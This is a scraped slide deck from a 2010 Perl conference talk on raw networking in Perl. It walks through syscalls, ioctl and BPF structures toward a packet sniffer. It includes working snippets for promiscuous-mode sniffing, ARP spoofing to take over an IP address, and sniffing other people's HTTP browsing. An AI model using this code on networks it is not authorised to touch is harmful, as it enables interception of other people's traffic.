Upload
tivona
View
23
Download
0
Embed Size (px)
DESCRIPTION
EXTREMELY LOW-LEVEL NETWORKING IN PERL (in order to get girls). Samy Kamkar. June 22, 2010. YAPC::NA 2010. Who is Samy?. Co-Founder of Fonality, IP PBX Company Passionate Perl Programmer ”Narcissistic Vulnerability Pimp” (aka Security Researcher for fun) Lady Gaga aficionado. - PowerPoint PPT Presentation
Citation preview
EXTREMELY LOW-LEVEL NETWORKING IN PERL
(in order to get girls)
Samy Kamkar
June 22, 2010
1
YAPC::NA 2010
Who is Samy?
• Co-Founder of Fonality, IP PBX Company
• Passionate Perl Programmer
• ”Narcissistic Vulnerability Pimp”
(aka Security Researcher for fun)
• Lady Gaga aficionado
2
Why am I talking?
• Share the awesomeness of the packet
• Prove that you can do low-level in Perl
• Explain why packet-fu is useful
• Provide examples of useful tools
• Write portable, system-level software
• I like turtles
3
What can we do with this?
• System-Level Software– Porting tools like tcpdump, ifconfig, lsof, arp, etc
• Network Monitoring– Intrusion Detection Systems, Port Scanning
• Packet sniffing/injection/pen testing– Deciphering protocols, packet “grepping”– Packet replaying, man-in-the-middling– Traffic/flow control, TCP session control– Browser following (HTTP sniffing) – Network mapping/fingerprinting– ARP spoofing, DNS spoofing
4
5
So how do we do it?
• Inline::C … cool, but NAH!• XS .. That’s a great way…but nope!• system() ? LOLOCOPTERS!• syscall() //;# low-level syscalls in perl!• syscall(&SYS___sysctl, …) //;# sysctl in perl!• ioctl() //;# control special devices/FHs!• fcntl() //;# more control over devices!• pack()/unpack() //;# deal with binary strings• socket() //;# we’ll use this for some raw sockets• setsockopt() //;# more modifications to sockets
6
Requirements: C Structures
struct bpf_program {
u_int bf_len; // 4 bytes
struct bpf_insn *bf_insns; // below..
};
struct bpf_insn {
u_short code; // 2 bytes
u_char jt; // 1 byte
u_char jf; // 1 byte
bpf_u_int32 k; // 4 bytes
}; // total = 8 bytes7
The Basics: Automation
• Don’t convert .h (headers) to perl• Perl will do it for you!
• h2ph.pl (old school)• c2phear.pl, part of Packet• use Config.pm to tell you type sizes
# SIZE MATTERSuse Config;
print $Config{“intsize”}; # 4 8
Things that went out of style by early 2000
9
h2ph
The Basics: C Definitions/Sizes#define BPF_MAXBUFSIZE 0x80000
sub BPF_MAXBUFSIZE { 0x80000 }
#define _IOC(inout,group,num,len) (inout | ((len & IOCPARM_MASK) << 16) | ((group) << 8) | (num))
sub _IOC {
my ($inout, $group, $num, $len) = @_;
($inout | (($len & &IOCPARM_MASK) << 16) | (($group) << 8) | ($num)); }
#define _IOR(g,n,t) _IOC(IOC_OUT, (g), (n), sizeof(t))
use Config;
sub _IOR {
my ($g, $n, $t) = @_;
&_IOC( &IOC_OUT, $g, $n, $Config{$t . “size”}); } 10
The Basics: C Structures// Use pack()/unpack()
// to do these in perl!
struct bpf_program {
u_int bf_len;
struct bpf_insn *bf_insns;
};
struct bpf_insn {
u_short code;
u_char jt;
u_char jf;
bpf_u_int32 k;
}; 11
sub bpf_program{ my %struct = @_; my $len = length(bpf_insn());
pack(“Ia$len”, $struct{‘bf_len’}, bpf_insn( %{$struct{‘*bf_insns’}} ) );}
sub bpf_insn{ my %struct = @_; pack(“SaaI”, @struct{qw/ code jt jf k /} );}
sysctl() to get/set system info// from arp.c on OS X & FreeBSD
int mib[6]; size_t needed;
mib[0] = CTL_NET; mib[1] = PF_ROUTE;
mib[2] = 0; mib[3] = AF_INET;
mib[4] = NET_RT_FLAGS; mib[5] = RTF_LLINFO;
sysctl(mib, 6, NULL, &needed, NULL, 0);
# in Perl, $needed also updates without using a ref
my $needed = “\0” x $Config{“intsize”};
my @mib = (&CTL_NET, &PF_ROUTE, 0, &AF_INET, &NET_RT_FLAGS, &RTF_LLINFO);
my $mib = pack(‘i’ x @mib, @mib);
syscall(&SYS___sysctl, $mib, 6, 0, $needed, 0, 0);12
ioctl() and raw devices example:a BPF sniffer in perl
# raw BPF sniffer in perl (no libpcap!), works on Linux, OS X, *BSD
use Packet; # import our C definitions/structs/etc
open(FD, "</dev/bpf0"); # open our BPF device
$ifr = pack('a16@48', "eth0"); # set up network interface to be read
ioctl(FD, &BIOCSETIF, $ifr); # attach network interface to bpf device
ioctl(FD, &BIOCPROMISC, $undef); # go into promiscuous mode...naughty!
ioctl(FD, &BIOCGBLEN, $size); # how much we can read at a time
$buflen = unpack("l", $size); # our size is in ascii so get decimal
while (1)
{
sysread(FD, $data, $buflen); # read in our bpf header
while (length($data))
{
$bpf = bpf_hdr_unpack($data); # unpack the bpf header
$packet = substr($data, 0, # remove bpf header from packet
BPF_WORDALIGN($bpf->{bh_caplen} + $bpf->{bh_hdrlen}), undef);
print unpack(“H*”, substr($packet, $bpf->{bh_caplen})) . “\n”; # actual packet!
}
}
13
BPF sniffer: continuedsamy@donttasemebro$ perl bpfsniff.pl# ICMP echo request001b63f35e42001ec2bf76ee08004500005422180000400147720a00011c04020
2020800a1530ecd0000cd09174c6b860d0008090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637
# ICMP echo reply001ec2bf76ee001b63f35e420800450000544aad0000380126dd040202020a000
11c0000e3460ecd0000cd09174c6b860d0008090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637
Ethernet header: 14 bytesIP header: 20 bytes (can be more with IP options)ICMP header: 8 bytesICMP data: 52 bytes (variable)Sniffing your neighbor’s network: Priceless
14
A Brief History of Crime
15
A Portable Packet Snifferuse Packet;
my $eth = new Packet::Ethernet;
my $ip = new Packet::IP;
my $s = Packet::Sniff->new(device => $DEVICE); # start monitoring
$s->open() || die $s->{errbuf}; # open our device
$s->loop(0, \&callback); # send packets to callback
sub callback {
my ($ud, $hdr, $pkt, $s) = @_;
my ($time, $hi) = Time::HiRes::gettimeofday(); # high-res time
$time = $1 if localtime($time) =~ /(\d+:\d+:\d+)/; # current time
$eth->decode($pkt); # decode ethernet packet
if ($eth->type == 0x0800) # 0x0800 == IP packet
{
$ip->decode($eth->data); # decode IP packet
print "$time.$hi IP $ip->{src_ip} -> $ip->{dest_ip}: proto $ip->{proto}\n” .
unpack(“H*”, $pkt) . “\n”; # print packet + header
}
}16
A Portable Packet Sniffer: cont.samy@donttasemebro$ perl packetsniff.pl# ICMP echo request23:08:13.933668 IP 10.0.1.28 -> 4.2.2.2: proto 1 (ICMP)# ICMP echo reply23:08:13.933995 IP 4.2.2.2 -> 10.0.1.28: proto 1 (ICMP)
17
This is your network.
18
This is your network on drugs.
19
ARP Spoofing
20
ARP Spoofing
ARP Spoofing – Simple!my $raw = new Packet::Inject(device => $device); # inject raw packets!
my $eth = new Packet::Ethernet()->encode(); # eth pkt will broadcast
my $arp = new Packet::ARP(
sender_eth => "a:b:c:d:e:f", # our MAC
target_eth => ”ff:ff:ff:ff:ff:ff", # broadcast
sender_ip => ”10.0.0.1", # ip we’re stealing
target_ip => ”255.255.255.255” # notifying broadcast
)->encode(); # now we have a built packet $arp
$raw->open(); # open our device for injection
$raw->write(packet => $eth . $arp); # inject!!!
$raw->close();
21
22
Epic Browser Sniffing FTW sub callback {
my ($ud, $hdr, $pkt, $s) = @_;
$eth->decode($pkt); # decode ethernet packet
if ($eth->type == 0x0800) { # 0x0800 == IP packet
$ip->decode($eth->data); # decode IP packet
if ($ip->proto == 6) { # TCP packet
$tcp->decode($ip->data); # decode TCP packet
if ($tcp->dest_port == 80) { # HTTP packet
# read HTTP header
if ($tcp->data =~ /GET (\S+) HTTP.*?Host: (\S+)/s) {
# use applescript to open our browser!
system qq{osascript -e 'tell application "Safari”
to open location “http://$2$1”’};
}}}}} 23
24
Q&AA gentleman never asks.A lady never tells.
25
FinPacket (Perl module suite): samy.pl/packeth2ph: man h2phpwnat: samy.pl/pwnat
Samy [email protected] twitter.com/SamyKamkar 26